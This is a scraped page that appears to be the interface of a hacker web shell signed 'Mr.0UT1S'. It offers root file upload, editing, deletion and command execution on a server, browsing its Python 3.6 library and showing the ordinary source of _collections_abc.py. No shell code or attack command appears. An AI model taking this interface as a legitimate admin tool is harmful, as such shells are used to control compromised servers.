lib64
/
python3.6
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] __pycache__
N/A
[DIR] asyncio
N/A
[DIR] collections
N/A
[DIR] concurrent
N/A
[DIR] config-3.6m-x86_64-linux-gnu
N/A
[DIR] ctypes
N/A
[DIR] curses
N/A
[DIR] dbm
N/A
[DIR] distutils
N/A
[DIR] email
N/A
[DIR] encodings
N/A
[DIR] ensurepip
N/A
[DIR] html
N/A
[DIR] http
N/A
[DIR] importlib
N/A
[DIR] json
N/A
[DIR] lib-dynload
N/A
[DIR] lib2to3
N/A
[DIR] logging
N/A
[DIR] multiprocessing
N/A
[DIR] pydoc_data
N/A
[DIR] site-packages
N/A
[DIR] sqlite3
N/A
[DIR] test
N/A
[DIR] unittest
N/A
[DIR] urllib
N/A
[DIR] venv
N/A
[DIR] wsgiref
N/A
[DIR] xml
N/A
[DIR] xmlrpc
N/A
__future__.py
4.73 KB
Rename
Delete
__phello__.foo.py
64 bytes
Rename
Delete
_bootlocale.py
1.27 KB
Rename
Delete
_collections_abc.py
25.77 KB
Rename
Delete
_compat_pickle.py
8.54 KB
Rename
Delete
_compression.py
5.21 KB
Rename
Delete
_dummy_thread.py
5.00 KB
Rename
Delete
_markupbase.py
14.26 KB
Rename
Delete
_osx_support.py
18.69 KB
Rename
Delete
_pydecimal.py
224.83 KB
Rename
Delete
_pyio.py
86.03 KB
Rename
Delete
_sitebuiltins.py
3.04 KB
Rename
Delete
_strptime.py
24.17 KB
Rename
Delete
_sysconfigdata_dm_linux_x86_64-linux-gnu.py
29.48 KB
Rename
Delete
_sysconfigdata_m_linux_x86_64-linux-gnu.py
29.66 KB
Rename
Delete
_threading_local.py
7.04 KB
Rename
Delete
_weakrefset.py
5.57 KB
Rename
Delete
abc.py
8.52 KB
Rename
Delete
aifc.py
31.69 KB
Rename
Delete
antigravity.py
477 bytes
Rename
Delete
argparse.py
88.25 KB
Rename
Delete
ast.py
11.88 KB
Rename
Delete
asynchat.py
11.06 KB
Rename
Delete
asyncore.py
19.69 KB
Rename
Delete
base64.py
19.91 KB
Rename
Delete
bdb.py
23.00 KB
Rename
Delete
binhex.py
13.63 KB
Rename
Delete
bisect.py
2.53 KB
Rename
Delete
bz2.py
12.19 KB
Rename
Delete
cProfile.py
5.25 KB
Rename
Delete
calendar.py
22.67 KB
Rename
Delete
cgi.py
36.35 KB
Rename
Delete
cgitb.py
11.74 KB
Rename
Delete
chunk.py
5.30 KB
Rename
Delete
cmd.py
14.51 KB
Rename
Delete
code.py
10.37 KB
Rename
Delete
codecs.py
35.43 KB
Rename
Delete
codeop.py
5.85 KB
Rename
Delete
colorsys.py
3.97 KB
Rename
Delete
compileall.py
11.84 KB
Rename
Delete
configparser.py
52.34 KB
Rename
Delete
contextlib.py
12.85 KB
Rename
Delete
copy.py
8.61 KB
Rename
Delete
copyreg.py
6.84 KB
Rename
Delete
crypt.py
1.82 KB
Rename
Delete
csv.py
15.80 KB
Rename
Delete
datetime.py
80.11 KB
Rename
Delete
decimal.py
320 bytes
Rename
Delete
difflib.py
82.40 KB
Rename
Delete
dis.py
17.71 KB
Rename
Delete
doctest.py
101.94 KB
Rename
Delete
dummy_threading.py
2.75 KB
Rename
Delete
enum.py
32.82 KB
Rename
Delete
filecmp.py
9.60 KB
Rename
Delete
fileinput.py
14.13 KB
Rename
Delete
fnmatch.py
3.09 KB
Rename
Delete
formatter.py
14.79 KB
Rename
Delete
fractions.py
23.08 KB
Rename
Delete
ftplib.py
34.78 KB
Rename
Delete
functools.py
30.61 KB
Rename
Delete
genericpath.py
4.64 KB
Rename
Delete
getopt.py
7.31 KB
Rename
Delete
getpass.py
5.85 KB
Rename
Delete
gettext.py
21.03 KB
Rename
Delete
glob.py
5.51 KB
Rename
Delete
gzip.py
19.86 KB
Rename
Delete
hashlib.py
8.59 KB
Rename
Delete
heapq.py
22.39 KB
Rename
Delete
hmac.py
6.23 KB
Rename
Delete
imaplib.py
52.05 KB
Rename
Delete
imghdr.py
3.71 KB
Rename
Delete
imp.py
10.42 KB
Rename
Delete
inspect.py
114.22 KB
Rename
Delete
io.py
3.43 KB
Rename
Delete
ipaddress.py
75.99 KB
Rename
Delete
keyword.py
2.17 KB
Rename
Delete
linecache.py
5.19 KB
Rename
Delete
locale.py
75.49 KB
Rename
Delete
lzma.py
12.68 KB
Rename
Delete
macpath.py
5.83 KB
Rename
Delete
macurl2path.py
2.67 KB
Rename
Delete
mailbox.py
76.78 KB
Rename
Delete
mailcap.py
8.85 KB
Rename
Delete
mimetypes.py
20.55 KB
Rename
Delete
modulefinder.py
22.49 KB
Rename
Delete
netrc.py
5.55 KB
Rename
Delete
nntplib.py
42.07 KB
Rename
Delete
ntpath.py
22.55 KB
Rename
Delete
nturl2path.py
2.39 KB
Rename
Delete
numbers.py
10.00 KB
Rename
Delete
opcode.py
5.69 KB
Rename
Delete
operator.py
10.61 KB
Rename
Delete
optparse.py
58.96 KB
Rename
Delete
os.py
36.65 KB
Rename
Delete
pathlib.py
47.83 KB
Rename
Delete
pdb.py
59.88 KB
Rename
Delete
pickle.py
54.39 KB
Rename
Delete
pickletools.py
89.62 KB
Rename
Delete
pipes.py
8.71 KB
Rename
Delete
pkgutil.py
20.82 KB
Rename
Delete
platform.py
46.11 KB
Rename
Delete
plistlib.py
31.53 KB
Rename
Delete
poplib.py
14.61 KB
Rename
Delete
posixpath.py
15.40 KB
Rename
Delete
pprint.py
20.37 KB
Rename
Delete
profile.py
21.51 KB
Rename
Delete
pstats.py
25.94 KB
Rename
Delete
pty.py
4.65 KB
Rename
Delete
py_compile.py
7.01 KB
Rename
Delete
pyclbr.py
13.24 KB
Rename
Delete
pydoc.py
101.08 KB
Rename
Delete
queue.py
8.57 KB
Rename
Delete
quopri.py
7.09 KB
Rename
Delete
random.py
26.80 KB
Rename
Delete
re.py
15.19 KB
Rename
Delete
reprlib.py
5.21 KB
Rename
Delete
rlcompleter.py
6.93 KB
Rename
Delete
runpy.py
11.68 KB
Rename
Delete
sched.py
6.36 KB
Rename
Delete
secrets.py
1.99 KB
Rename
Delete
selectors.py
18.98 KB
Rename
Delete
shelve.py
8.32 KB
Rename
Delete
shlex.py
12.65 KB
Rename
Delete
shutil.py
39.87 KB
Rename
Delete
signal.py
2.07 KB
Rename
Delete
site.py
20.77 KB
Rename
Delete
smtpd.py
33.91 KB
Rename
Delete
smtplib.py
43.18 KB
Rename
Delete
sndhdr.py
6.92 KB
Rename
Delete
socket.py
26.80 KB
Rename
Delete
socketserver.py
26.38 KB
Rename
Delete
sre_compile.py
18.88 KB
Rename
Delete
sre_constants.py
6.66 KB
Rename
Delete
sre_parse.py
35.68 KB
Rename
Delete
ssl.py
43.47 KB
Rename
Delete
stat.py
4.92 KB
Rename
Delete
statistics.py
20.19 KB
Rename
Delete
string.py
11.52 KB
Rename
Delete
stringprep.py
12.61 KB
Rename
Delete
struct.py
257 bytes
Rename
Delete
subprocess.py
60.88 KB
Rename
Delete
sunau.py
17.67 KB
Rename
Delete
symbol.py
2.07 KB
Rename
Delete
symtable.py
7.11 KB
Rename
Delete
sysconfig.py
24.29 KB
Rename
Delete
tabnanny.py
11.14 KB
Rename
Delete
tarfile.py
104.88 KB
Rename
Delete
telnetlib.py
22.59 KB
Rename
Delete
tempfile.py
27.41 KB
Rename
Delete
textwrap.py
19.10 KB
Rename
Delete
this.py
1003 bytes
Rename
Delete
threading.py
48.96 KB
Rename
Delete
timeit.py
13.03 KB
Rename
Delete
token.py
3.00 KB
Rename
Delete
tokenize.py
28.80 KB
Rename
Delete
trace.py
28.06 KB
Rename
Delete
traceback.py
22.91 KB
Rename
Delete
tracemalloc.py
16.27 KB
Rename
Delete
tty.py
879 bytes
Rename
Delete
types.py
8.66 KB
Rename
Delete
typing.py
78.39 KB
Rename
Delete
uu.py
6.60 KB
Rename
Delete
uuid.py
23.46 KB
Rename
Delete
warnings.py
18.05 KB
Rename
Delete
wave.py
17.29 KB
Rename
Delete
weakref.py
19.99 KB
Rename
Delete
webbrowser.py
21.26 KB
Rename
Delete
xdrlib.py
5.77 KB
Rename
Delete
zipapp.py
6.99 KB
Rename
Delete
zipfile.py
78.05 KB
Rename
Delete
# Copyright 2007 Google, Inc. All Rights Reserved. # Licensed to PSF under a Contributor Agreement. """Abstract Base Classes (ABCs) for collections, according to PEP 3119. Unit tests are in test_collections. """ from abc import ABCMeta, abstractmethod import sys __all__ = ["Awaitable", "Coroutine", "AsyncIterable", "AsyncIterator", "AsyncGenerator", "Hashable", "Iterable", "Iterator", "Generator", "Reversible", "Sized", "Container", "Callable", "Collection", "Set", "MutableSet", "Mapping", "MutableMapping", "MappingView", "KeysView", "ItemsView", "ValuesView", "Sequence", "MutableSequence", "ByteString", ] # This module has been renamed from collections.abc to _collections_abc to # speed up interpreter startup. Some of the types such as MutableMapping are # required early but collections module imports a lot of other modules. # See issue #19218 __name__ = "collections.abc" # Private list of types that we want to register with the various ABCs # so that they will pass tests like: # it = iter(somebytearray) # assert isinstance(it, Iterable) # Note: in other implementations, these types might not be distinct # and they may have their own implementation specific types that # are not included on this list. bytes_iterator = type(iter(b'')) bytearray_iterator = type(iter(bytearray())) #callable_iterator = ??? dict_keyiterator = type(iter({}.keys())) dict_valueiterator = type(iter({}.values())) dict_itemiterator = type(iter({}.items())) list_iterator = type(iter([])) list_reverseiterator = type(iter(reversed([]))) range_iterator = type(iter(range(0))) longrange_iterator = type(iter(range(1 << 1000))) set_iterator = type(iter(set())) str_iterator = type(iter("")) tuple_iterator = type(iter(())) zip_iterator = type(iter(zip())) ## views ## dict_keys = type({}.keys()) dict_values = type({}.values()) dict_items = type({}.items()) ## misc ## mappingproxy = type(type.__dict__) generator = type((lambda: (yield))()) ## coroutine ## async def _coro(): pass _coro = _coro() coroutine = type(_coro) _coro.close() # Prevent ResourceWarning del _coro ## asynchronous generator ## async def _ag(): yield _ag = _ag() async_generator = type(_ag) del _ag ### ONE-TRICK PONIES ### def _check_methods(C, *methods): mro = C.__mro__ for method in methods: for B in mro: if method in B.__dict__: if B.__dict__[method] is None: return NotImplemented break else: return NotImplemented return True class Hashable(metaclass=ABCMeta): __slots__ = () @abstractmethod def __hash__(self): return 0 @classmethod def __subclasshook__(cls, C): if cls is Hashable: return _check_methods(C, "__hash__") return NotImplemented class Awaitable(metaclass=ABCMeta): __slots__ = () @abstractmethod def __await__(self): yield @classmethod def __subclasshook__(cls, C): if cls is Awaitable: return _check_methods(C, "__await__") return NotImplemented class Coroutine(Awaitable): __slots__ = () @abstractmethod def send(self, value): """Send a value into the coroutine. Return next yielded value or raise StopIteration. """ raise StopIteration @abstractmethod def throw(self, typ, val=None, tb=None): """Raise an exception in the coroutine. Return next yielded value or raise StopIteration. """ if val is None: if tb is None: raise typ val = typ() if tb is not None: val = val.with_traceback(tb) raise val def close(self): """Raise GeneratorExit inside coroutine. """ try: self.throw(GeneratorExit) except (GeneratorExit, StopIteration): pass else: raise RuntimeError("coroutine ignored GeneratorExit") @classmethod def __subclasshook__(cls, C): if cls is Coroutine: return _check_methods(C, '__await__', 'send', 'throw', 'close') return NotImplemented Coroutine.register(coroutine) class AsyncIterable(metaclass=ABCMeta): __slots__ = () @abstractmethod def __aiter__(self): return AsyncIterator() @classmethod def __subclasshook__(cls, C): if cls is AsyncIterable: return _check_methods(C, "__aiter__") return NotImplemented class AsyncIterator(AsyncIterable): __slots__ = () @abstractmethod async def __anext__(self): """Return the next item or raise StopAsyncIteration when exhausted.""" raise StopAsyncIteration def __aiter__(self): return self @classmethod def __subclasshook__(cls, C): if cls is AsyncIterator: return _check_methods(C, "__anext__", "__aiter__") return NotImplemented class AsyncGenerator(AsyncIterator): __slots__ = () async def __anext__(self): """Return the next item from the asynchronous generator. When exhausted, raise StopAsyncIteration. """ return await self.asend(None) @abstractmethod async def asend(self, value): """Send a value into the asynchronous generator. Return next yielded value or raise StopAsyncIteration. """ raise StopAsyncIteration @abstractmethod async def athrow(self, typ, val=None, tb=None): """Raise an exception in the asynchronous generator. Return next yielded value or raise StopAsyncIteration. """ if val is None: if tb is None: raise typ val = typ() if tb is not None: val = val.with_traceback(tb) raise val async def aclose(self): """Raise GeneratorExit inside coroutine. """ try: await self.athrow(GeneratorExit) except (GeneratorExit, StopAsyncIteration): pass else: raise RuntimeError("asynchronous generator ignored GeneratorExit") @classmethod def __subclasshook__(cls, C): if cls is AsyncGenerator: return _check_methods(C, '__aiter__', '__anext__', 'asend', 'athrow', 'aclose') return NotImplemented AsyncGenerator.register(async_generator) class Iterable(metaclass=ABCMeta): __slots__ = () @abstractmethod def __iter__(self): while False: yield None @classmethod def __subclasshook__(cls, C): if cls is Iterable: return _check_methods(C, "__iter__") return NotImplemented class Iterator(Iterable): __slots__ = () @abstractmethod def __next__(self): 'Return the next item from the iterator. When exhausted, raise StopIteration' raise StopIteration def __iter__(self): return self @classmethod def __subclasshook__(cls, C): if cls is Iterator: return _check_methods(C, '__iter__', '__next__') return NotImplemented Iterator.register(bytes_iterator) Iterator.register(bytearray_iterator) #Iterator.register(callable_iterator) Iterator.register(dict_keyiterator) Iterator.register(dict_valueiterator) Iterator.register(dict_itemiterator) Iterator.register(list_iterator) Iterator.register(list_reverseiterator) Iterator.register(range_iterator) Iterator.register(longrange_iterator) Iterator.register(set_iterator) Iterator.register(str_iterator) Iterator.register(tuple_iterator) Iterator.register(zip_iterator) class Reversible(Iterable): __slots__ = () @abstractmethod def __reversed__(self): while False: yield None @classmethod def __subclasshook__(cls, C): if cls is Reversible: return _check_methods(C, "__reversed__", "__iter__") return NotImplemented class Generator(Iterator): __slots__ = () def __next__(self): """Return the next item from the generator. When exhausted, raise StopIteration. """ return self.send(None) @abstractmethod def send(self, value): """Send a value into the generator. Return next yielded value or raise StopIteration. """ raise StopIteration @abstractmethod def throw(self, typ, val=None, tb=None): """Raise an exception in the generator. Return next yielded value or raise StopIteration. """ if val is None: if tb is None: raise typ val = typ() if tb is not None: val = val.with_traceback(tb) raise val def close(self): """Raise GeneratorExit inside generator. """ try: self.throw(GeneratorExit) except (GeneratorExit, StopIteration): pass else: raise RuntimeError("generator ignored GeneratorExit") @classmethod def __subclasshook__(cls, C): if cls is Generator: return _check_methods(C, '__iter__', '__next__', 'send', 'throw', 'close') return NotImplemented Generator.register(generator) class Sized(metaclass=ABCMeta): __slots__ = () @abstractmethod def __len__(self): return 0 @classmethod def __subclasshook__(cls, C): if cls is Sized: return _check_methods(C, "__len__") return NotImplemented class Container(metaclass=ABCMeta): __slots__ = () @abstractmethod def __contains__(self, x): return False @classmethod def __subclasshook__(cls, C): if cls is Container: return _check_methods(C, "__contains__") return NotImplemented class Collection(Sized, Iterable, Container): __slots__ = () @classmethod def __subclasshook__(cls, C): if cls is Collection: return _check_methods(C, "__len__", "__iter__", "__contains__") return NotImplemented class Callable(metaclass=ABCMeta): __slots__ = () @abstractmethod def __call__(self, *args, **kwds): return False @classmethod def __subclasshook__(cls, C): if cls is Callable: return _check_methods(C, "__call__") return NotImplemented ### SETS ### class Set(Collection): """A set is a finite, iterable container. This class provides concrete generic implementations of all methods except for __contains__, __iter__ and __len__. To override the comparisons (presumably for speed, as the semantics are fixed), redefine __le__ and __ge__, then the other operations will automatically follow suit. """ __slots__ = () def __le__(self, other): if not isinstance(other, Set): return NotImplemented if len(self) > len(other): return False for elem in self: if elem not in other: return False return True def __lt__(self, other): if not isinstance(other, Set): return NotImplemented return len(self) < len(other) and self.__le__(other) def __gt__(self, other): if not isinstance(other, Set): return NotImplemented return len(self) > len(other) and self.__ge__(other) def __ge__(self, other): if not isinstance(other, Set): return NotImplemented if len(self) < len(other): return False for elem in other: if elem not in self: return False return True def __eq__(self, other): if not isinstance(other, Set): return NotImplemented return len(self) == len(other) and self.__le__(other) @classmethod def _from_iterable(cls, it): '''Construct an instance of the class from any iterable input. Must override this method if the class constructor signature does not accept an iterable for an input. ''' return cls(it) def __and__(self, other): if not isinstance(other, Iterable): return NotImplemented return self._from_iterable(value for value in other if value in self) __rand__ = __and__ def isdisjoint(self, other): 'Return True if two sets have a null intersection.' for value in other: if value in self: return False return True def __or__(self, other): if not isinstance(other, Iterable): return NotImplemented chain = (e for s in (self, other) for e in s) return self._from_iterable(chain) __ror__ = __or__ def __sub__(self, other): if not isinstance(other, Set): if not isinstance(other, Iterable): return NotImplemented other = self._from_iterable(other) return self._from_iterable(value for value in self if value not in other) def __rsub__(self, other): if not isinstance(other, Set): if not isinstance(other, Iterable): return NotImplemented other = self._from_iterable(other) return self._from_iterable(value for value in other if value not in self) def __xor__(self, other): if not isinstance(other, Set): if not isinstance(other, Iterable): return NotImplemented other = self._from_iterable(other) return (self - other) | (other - self) __rxor__ = __xor__ def _hash(self): """Compute the hash value of a set. Note that we don't define __hash__: not all sets are hashable. But if you define a hashable set type, its __hash__ should call this function. This must be compatible __eq__. All sets ought to compare equal if they contain the same elements, regardless of how they are implemented, and regardless of the order of the elements; so there's not much freedom for __eq__ or __hash__. We match the algorithm used by the built-in frozenset type. """ MAX = sys.maxsize MASK = 2 * MAX + 1 n = len(self) h = 1927868237 * (n + 1) h &= MASK for x in self: hx = hash(x) h ^= (hx ^ (hx << 16) ^ 89869747) * 3644798167 h &= MASK h = h * 69069 + 907133923 h &= MASK if h > MAX: h -= MASK + 1 if h == -1: h = 590923713 return h Set.register(frozenset) class MutableSet(Set): """A mutable set is a finite, iterable container. This class provides concrete generic implementations of all methods except for __contains__, __iter__, __len__, add(), and discard(). To override the comparisons (presumably for speed, as the semantics are fixed), all you have to do is redefine __le__ and then the other operations will automatically follow suit. """ __slots__ = () @abstractmethod def add(self, value): """Add an element.""" raise NotImplementedError @abstractmethod def discard(self, value): """Remove an element. Do not raise an exception if absent.""" raise NotImplementedError def remove(self, value): """Remove an element. If not a member, raise a KeyError.""" if value not in self: raise KeyError(value) self.discard(value) def pop(self): """Return the popped value. Raise KeyError if empty.""" it = iter(self) try: value = next(it) except StopIteration: raise KeyError self.discard(value) return value def clear(self): """This is slow (creates N new iterators!) but effective.""" try: while True: self.pop() except KeyError: pass def __ior__(self, it): for value in it: self.add(value) return self def __iand__(self, it): for value in (self - it): self.discard(value) return self def __ixor__(self, it): if it is self: self.clear() else: if not isinstance(it, Set): it = self._from_iterable(it) for value in it: if value in self: self.discard(value) else: self.add(value) return self def __isub__(self, it): if it is self: self.clear() else: for value in it: self.discard(value) return self MutableSet.register(set) ### MAPPINGS ### class Mapping(Collection): __slots__ = () """A Mapping is a generic container for associating key/value pairs. This class provides concrete generic implementations of all methods except for __getitem__, __iter__, and __len__. """ @abstractmethod def __getitem__(self, key): raise KeyError def get(self, key, default=None): 'D.get(k[,d]) -> D[k] if k in D, else d. d defaults to None.' try: return self[key] except KeyError: return default def __contains__(self, key): try: self[key] except KeyError: return False else: return True def keys(self): "D.keys() -> a set-like object providing a view on D's keys" return KeysView(self) def items(self): "D.items() -> a set-like object providing a view on D's items" return ItemsView(self) def values(self): "D.values() -> an object providing a view on D's values" return ValuesView(self) def __eq__(self, other): if not isinstance(other, Mapping): return NotImplemented return dict(self.items()) == dict(other.items()) __reversed__ = None Mapping.register(mappingproxy) class MappingView(Sized): __slots__ = '_mapping', def __init__(self, mapping): self._mapping = mapping def __len__(self): return len(self._mapping) def __repr__(self): return '{0.__class__.__name__}({0._mapping!r})'.format(self) class KeysView(MappingView, Set): __slots__ = () @classmethod def _from_iterable(self, it): return set(it) def __contains__(self, key): return key in self._mapping def __iter__(self): yield from self._mapping KeysView.register(dict_keys) class ItemsView(MappingView, Set): __slots__ = () @classmethod def _from_iterable(self, it): return set(it) def __contains__(self, item): key, value = item try: v = self._mapping[key] except KeyError: return False else: return v is value or v == value def __iter__(self): for key in self._mapping: yield (key, self._mapping[key]) ItemsView.register(dict_items) class ValuesView(MappingView): __slots__ = () def __contains__(self, value): for key in self._mapping: v = self._mapping[key] if v is value or v == value: return True return False def __iter__(self): for key in self._mapping: yield self._mapping[key] ValuesView.register(dict_values) class MutableMapping(Mapping): __slots__ = () """A MutableMapping is a generic container for associating key/value pairs. This class provides concrete generic implementations of all methods except for __getitem__, __setitem__, __delitem__, __iter__, and __len__. """ @abstractmethod def __setitem__(self, key, value): raise KeyError @abstractmethod def __delitem__(self, key): raise KeyError __marker = object() def pop(self, key, default=__marker): '''D.pop(k[,d]) -> v, remove specified key and return the corresponding value. If key is not found, d is returned if given, otherwise KeyError is raised. ''' try: value = self[key] except KeyError: if default is self.__marker: raise return default else: del self[key] return value def popitem(self): '''D.popitem() -> (k, v), remove and return some (key, value) pair as a 2-tuple; but raise KeyError if D is empty. ''' try: key = next(iter(self)) except StopIteration: raise KeyError value = self[key] del self[key] return key, value def clear(self): 'D.clear() -> None. Remove all items from D.' try: while True: self.popitem() except KeyError: pass def update(*args, **kwds): ''' D.update([E, ]**F) -> None. Update D from mapping/iterable E and F. If E present and has a .keys() method, does: for k in E: D[k] = E[k] If E present and lacks .keys() method, does: for (k, v) in E: D[k] = v In either case, this is followed by: for k, v in F.items(): D[k] = v ''' if not args: raise TypeError("descriptor 'update' of 'MutableMapping' object " "needs an argument") self, *args = args if len(args) > 1: raise TypeError('update expected at most 1 arguments, got %d' % len(args)) if args: other = args[0] if isinstance(other, Mapping): for key in other: self[key] = other[key] elif hasattr(other, "keys"): for key in other.keys(): self[key] = other[key] else: for key, value in other: self[key] = value for key, value in kwds.items(): self[key] = value def setdefault(self, key, default=None): 'D.setdefault(k[,d]) -> D.get(k,d), also set D[k]=d if k not in D' try: return self[key] except KeyError: self[key] = default return default MutableMapping.register(dict) ### SEQUENCES ### class Sequence(Reversible, Collection): """All the operations on a read-only sequence. Concrete subclasses must override __new__ or __init__, __getitem__, and __len__. """ __slots__ = () @abstractmethod def __getitem__(self, index): raise IndexError def __iter__(self): i = 0 try: while True: v = self[i] yield v i += 1 except IndexError: return def __contains__(self, value): for v in self: if v is value or v == value: return True return False def __reversed__(self): for i in reversed(range(len(self))): yield self[i] def index(self, value, start=0, stop=None): '''S.index(value, [start, [stop]]) -> integer -- return first index of value. Raises ValueError if the value is not present. Supporting start and stop arguments is optional, but recommended. ''' if start is not None and start < 0: start = max(len(self) + start, 0) if stop is not None and stop < 0: stop += len(self) i = start while stop is None or i < stop: try: v = self[i] if v is value or v == value: return i except IndexError: break i += 1 raise ValueError def count(self, value): 'S.count(value) -> integer -- return number of occurrences of value' return sum(1 for v in self if v is value or v == value) Sequence.register(tuple) Sequence.register(str) Sequence.register(range) Sequence.register(memoryview) class ByteString(Sequence): """This unifies bytes and bytearray. XXX Should add all their methods. """ __slots__ = () ByteString.register(bytes) ByteString.register(bytearray) class MutableSequence(Sequence): __slots__ = () """All the operations on a read-write sequence. Concrete subclasses must provide __new__ or __init__, __getitem__, __setitem__, __delitem__, __len__, and insert(). """ @abstractmethod def __setitem__(self, index, value): raise IndexError @abstractmethod def __delitem__(self, index): raise IndexError @abstractmethod def insert(self, index, value): 'S.insert(index, value) -- insert value before index' raise IndexError def append(self, value): 'S.append(value) -- append value to the end of the sequence' self.insert(len(self), value) def clear(self): 'S.clear() -> None -- remove all items from S' try: while True: self.pop() except IndexError: pass def reverse(self): 'S.reverse() -- reverse *IN PLACE*' n = len(self) for i in range(n//2): self[i], self[n-i-1] = self[n-i-1], self[i] def extend(self, values): 'S.extend(iterable) -- extend sequence by appending elements from the iterable' for v in values: self.append(v) def pop(self, index=-1): '''S.pop([index]) -> item -- remove and return item at index (default last). Raise IndexError if list is empty or index is out of range. ''' v = self[index] del self[index] return v def remove(self, value): '''S.remove(value) -- remove first occurrence of value. Raise ValueError if the value is not present. ''' del self[self.index(value)] def __iadd__(self, values): self.extend(values) return self MutableSequence.register(list) MutableSequence.register(bytearray) # Multiply inheriting, see ByteString
Save